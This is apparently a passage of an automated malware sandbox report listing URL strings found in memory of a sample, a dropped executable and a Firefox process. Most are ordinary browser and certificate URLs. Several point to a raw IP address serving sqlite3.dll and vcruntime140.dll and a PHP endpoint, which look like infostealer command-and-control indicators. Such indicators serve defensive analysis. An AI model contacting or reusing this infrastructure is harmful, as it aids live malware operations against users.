                          Source: file.exe, 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://85.28.47.31/8405906461a5200c/sqlite3.dll
                          Source: file.exe, 00000000.00000002.2525036759.0000000000841000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31/8405906461a5200c/sqlite3.dllj
                          Source: file.exe, 00000000.00000002.2525036759.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31/8405906461a5200c/vcruntime140.dll
                          Source: 4ddf12fb51.exe, 00000032.00000002.3040813931.0000000000A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31/C
                          Source: 4ddf12fb51.exe, 0000002F.00000002.2934283237.0000000000752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31/hW
                          Source: file.exe, 00000000.00000002.2525036759.0000000000850000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31/n
                          Source: 4ddf12fb51.exe, 00000032.00000002.3040813931.0000000000A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31/s
                          Source: file.exe, 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: http://85.28.47.315499d72b3a3e55be.php.exe
                          Source: file.exe, 00000000.00000002.2525036759.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31L
                          Source: 4ddf12fb51.exe, 0000002F.00000002.2934283237.0000000000752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31_
                          Source: 4ddf12fb51.exe, 00000032.00000002.3040813931.0000000000A05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31ne
                          Source: 4ddf12fb51.exe, 0000002F.00000002.2934283237.0000000000752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.28.47.31v
                          Source: firefox.exe, 00000012.00000003.2898080233.000001E95BB00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                          Source: firefox.exe, 00000012.00000003.3083491145.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2594774383.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2885644894.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                          Source: firefox.exe, 00000012.00000003.3083491145.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2594774383.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2885644894.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                          Source: firefox.exe, 00000012.00000003.2898080233.000001E95BB00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                          Source: firefox.exe, 00000012.00000003.3086795673.000001E9569C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3086934152.000001E9569A4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3085020298.000001E95AB5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ciscobinary.openh264.org
                          Source: firefox.exe, 00000012.00000003.3086795673.000001E9569C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ciscobinary.openh264.org/
                          Source: firefox.exe, 00000012.00000003.3085203543.000001E95A9A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ciscobinary.openh264.org/openh264-android-aarch64-42954cf0fe8a2bdc97fdc180462a3eaefceb035f.zi
                          Source: firefox.exe, 00000012.00000003.3085203543.000001E95A9A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ciscobinary.openh264.org/openh264-android-arm-42954cf0fe8a2bdc97fdc180462a3eaefceb035f.zip
                          Source: firefox.exe, 00000012.00000003.3085203543.000001E95A9A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ciscobinary.openh264.org/openh264-android-x86-42954cf0fe8a2bdc97fdc180462a3eaefceb035f.zip
                          Source: firefox.exe, 00000012.00000003.3085203543.000001E95A9A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ciscobinary.openh264.org/openh264-android-x86_64-42954cf0fe8a2bdc97fdc180462a3eaefceb035f.zip
                          Source: firefox.exe, 00000012.00000003.3085203543.000001E95A9A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ciscobinary.openh264.org/openh264-linux32-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
                          Source: firefox.exe, 00000012.00000003.3085203543.000001E95A9A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ciscobinary.openh264.org/openh264-linux64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
                          Source: firefox.exe, 00000012.00000003.3085203543.000001E95A9A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ciscobinary.openh264.org/openh264-macosx64-2e1774ab6dc6c43debb0b5b628bdf122a391d521-2.zip
                          Source: firefox.exe, 00000012.00000003.3085203543.000001E95A9A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ciscobinary.openh264.org/openh264-macosx64-aarch64-2e1774ab6dc6c43debb0b5b628bdf122a391d521-2
                          Source: firefox.exe, 00000012.00000003.3085203543.000001E95A9A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ciscobinary.openh264.org/openh264-win32-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
                          Source: firefox.exe, 00000012.00000003.3085961974.000001E959BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3085203543.000001E95A9A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
                          Source: firefox.exe, 00000012.00000003.3085203543.000001E95A9A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ciscobinary.openh264.org/openh264-win64-aarch64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
                          Source: firefox.exe, 00000012.00000003.3086335305.000001E959B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2738887810.000001E959B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
                          Source: firefox.exe, 00000012.00000003.3083491145.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2594774383.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2885644894.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                          Source: firefox.exe, 00000012.00000003.2898080233.000001E95BB00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                          Source: firefox.exe, 00000012.00000003.2898080233.000001E95BB00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                          Source: firefox.exe, 00000012.00000003.3083491145.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2594774383.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2885644894.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: firefox.exe, 00000012.00000003.3083491145.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2594774383.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2885644894.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                          Source: firefox.exe, 00000012.00000003.2898080233.000001E95BB00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                          Source: firefox.exe, 00000012.00000003.2898080233.000001E95BB00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                          Source: firefox.exe, 00000012.00000003.3083491145.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2594774383.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2885644894.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                          Source: firefox.exe, 00000012.00000003.2898080233.000001E95BB00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                          Source: firefox.exe, 00000012.00000003.3083491145.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2594774383.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2885644894.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                          Source: firefox.exe, 00000012.00000003.2569023742.000001E95DCFE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2803394279.000001E9569C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2859795399.000001E95C7D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com
                          Source: firefox.exe, 00000012.00000003.3070555649.000001E95CC1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/
                          Source: firefox.exe, 00000012.00000003.2560204492.000001E95CA61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/canonical.html
                          Source: firefox.exe, 00000012.00000003.2560204492.000001E95CA61000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3085961974.000001E959BA5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2560204492.000001E95CA0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
                          Source: firefox.exe, 00000012.00000003.2569023742.000001E95DCFE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2560204492.000001E95CA0E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
                          Source: firefox.exe, 00000012.00000003.2875877920.000001E95D258000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2869503726.000001E95DC88000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2569023742.000001E95DC88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.addEventListener
                          Source: firefox.exe, 00000012.00000003.2875877920.000001E95D258000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2869503726.000001E95DC88000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2569023742.000001E95DC88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://developer.mozilla.org/en/docs/DOM:element.removeEventListener
                          Source: firefox.exe, 00000012.00000003.3195359917.000001E957B3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://en.w
                          Source: firefox.exe, 00000012.00000003.2742111843.000001E955C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/dates-and-times
                          Source: firefox.exe, 00000012.00000003.2742111843.000001E955C81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://exslt.org/regular-expressionsC:
                          Source: firefox.exe, 00000012.00000003.2627476493.000001E959ECA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2488891249.000001E95AAED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2485562564.000001E95AAE7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3057215225.000001E959ECA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2626650947.000001E95AAED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2825320343.000001E95CBDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2825320343.000001E95CBC8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2850974127.000001E95CB72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2825198080.000001E95CCD5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2626650947.000001E95AAA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2560204492.000001E95CAE5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2665868802.000001E95AAB7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3085869849.000001E95A254000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3072377191.000001E95AA8B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2728728519.000001E95AAED000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2700293600.000001E95A353000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2874094078.000001E95DC3F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2556115137.000001E95CDFB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2496450892.000001E95AAA7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3071362634.000001E959EBF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3073703501.000001E95AAB7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mozilla.org/MPL/2.0/.
                          Source: firefox.exe, 00000012.00000003.3083491145.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2594774383.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2885644894.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                          Source: firefox.exe, 00000012.00000003.2898080233.000001E95BB00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                          Source: firefox.exe, 00000012.00000003.2898080233.000001E95BB00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
                          Source: firefox.exe, 00000012.00000003.3083491145.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2594774383.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2885644894.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                          Source: firefox.exe, 00000012.00000003.2898080233.000001E95BB00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                          Source: firefox.exe, 00000012.00000003.3086335305.000001E959B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2738887810.000001E959B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://poczta.interia.pl/mh/?mailto=%sw
                          Source: firefox.exe, 00000012.00000003.2898080233.000001E95BB00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                          Source: firefox.exe, 00000012.00000003.2898080233.000001E95BB00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                          Source: firefox.exe, 00000012.00000003.2898080233.000001E95BB00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                          Source: firefox.exe, 00000012.00000003.3086335305.000001E959B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2738887810.000001E959B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://win.mail.ru/cgi-bin/sentmsg?mailto=%sy
                          Source: firefox.exe, 00000012.00000003.3197786148.000001E95C39F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                          Source: firefox.exe, 00000012.00000003.3197786148.000001E95C524000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                          Source: firefox.exe, 00000012.00000003.3197786148.000001E95C39F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                          Source: firefox.exe, 00000012.00000003.3181553847.000001E957B3A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3197786148.000001E95C39F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                          Source: firefox.exe, 00000012.00000003.3086335305.000001E959B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2738887810.000001E959B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.inbox.lv/rfc2368/?value=%su
                          Source: file.exe, file.exe, 00000000.00000002.2583329160.000000006CA9D000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                          Source: firefox.exe, 00000012.00000003.2898080233.000001E95BB00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com0
                          Source: firefox.exe, 00000012.00000003.2700846537.000001E95A254000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2698720328.000001E95A91B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2801317678.000001E959B1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2889121670.000001E95B146000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2592907332.000001E95CC6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul
                          Source: firefox.exe, 00000012.00000003.2849322278.000001E95CC5D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2866041123.000001E95CC6E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2592907332.000001E95CC6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul58Z
                          Source: firefox.exe, 00000012.00000003.2592907332.000001E95CC6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xulz
                          Source: file.exe, 00000000.00000002.2582105274.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2553708199.000000001AC5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                          Source: firefox.exe, 00000012.00000003.3197786148.000001E95C524000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                          Source: firefox.exe, 00000012.00000003.3197786148.000001E95C524000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                          Source: firefox.exe, 00000012.00000003.3197786148.000001E95C39F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                          Source: firefox.exe, 00000012.00000003.3083491145.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2594774383.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2885644894.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                          Source: firefox.exe, 00000012.00000003.3083491145.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2594774383.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2885644894.000001E95B1B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                          Source: firefox.exe, 00000012.00000003.2479180713.000001E95A52A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2475465600.000001E95A300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2479515609.000001E95A54B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2478451218.000001E95A508000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.duckduckgo.com/ac/
                          Source: firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.firefox.com/
                          Source: firefox.exe, 00000012.00000003.2740267659.000001E957740000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2738403683.000001E959BD9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2800500299.000001E959BD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org
                          Source: firefox.exe, 00000012.00000003.2607471320.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3058630463.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2691821176.000001E95AEFD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2692741855.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ads.stickyadstv.com/firefox-etp
                          Source: firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://amazon.com
                          Source: firefox.exe, 00000012.00000003.2803394279.000001E9569C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org
                          Source: firefox.exe, 00000012.00000003.2803394279.000001E9569C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/
                          Source: firefox.exe, 00000012.00000003.3086795673.000001E9569C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/3/GMP/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release/Win
                          Source: firefox.exe, 00000012.00000003.3085961974.000001E959BD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/re
                          Source: firefox.exe, 00000012.00000003.2804241041.000001E955DF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aus5.mozilla.org/update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release
                          Source: file.exe, 00000000.00000002.2564756762.0000000026CF2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2802529831.000001E95775B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2740136811.000001E95775B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2742111843.000001E955CB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                          Source: file.exe, 00000000.00000002.2564756762.0000000026CF2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2802529831.000001E95775B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2740136811.000001E95775B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2742111843.000001E955CB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                          Source: firefox.exe, 00000012.00000003.2479180713.000001E95A52A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2475465600.000001E95A300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2479515609.000001E95A54B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2478451218.000001E95A508000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://completion.amazon.com/search/complete?q=
                          Source: file.exe, 00000000.00000002.2564756762.0000000026CF2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2802529831.000001E95775B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2740136811.000001E95775B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2742111843.000001E955CB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                          Source: file.exe, 00000000.00000002.2564756762.0000000026CF2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2802529831.000001E95775B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2740136811.000001E95775B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2742111843.000001E955CB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                          Source: firefox.exe, 00000012.00000003.2875877920.000001E95D258000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2869503726.000001E95DC88000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2569023742.000001E95DC88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Mozilla/Add-ons/WebExtensions/API/tabs/captureTab
                          Source: firefox.exe, 00000012.00000003.2569023742.000001E95DC88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCapture
                          Source: firefox.exe, 00000012.00000003.2869503726.000001E95DC9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/releasePointerCaptureWebExtensionUncheckedLastErr
                          Source: firefox.exe, 00000012.00000003.2875877920.000001E95D258000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2869503726.000001E95DC88000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2569023742.000001E95DC88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCapture
                          Source: firefox.exe, 00000012.00000003.2869503726.000001E95DCA3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2569023742.000001E95DCA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Element/setPointerCaptureElementReleaseCaptureWarningElem
                          Source: firefox.exe, 00000012.00000003.2875877920.000001E95D258000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2869503726.000001E95DC88000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2569023742.000001E95DC88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryption
                          Source: firefox.exe, 00000012.00000003.2875877920.000001E95D258000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2869503726.000001E95DC88000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2569023742.000001E95DC88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsing
                          Source: firefox.exe, 00000012.00000003.3181966752.000001E957B3A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3181553847.000001E957B3A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.microsoft.c
                          Source: firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com
                          Source: firefox.exe, 00000012.00000003.2479180713.000001E95A52A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2475465600.000001E95A300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2692988098.000001E95AC91000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2479515609.000001E95A54B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2478451218.000001E95A508000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/
                          Source: firefox.exe, 00000012.00000003.2738811203.000001E959B97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
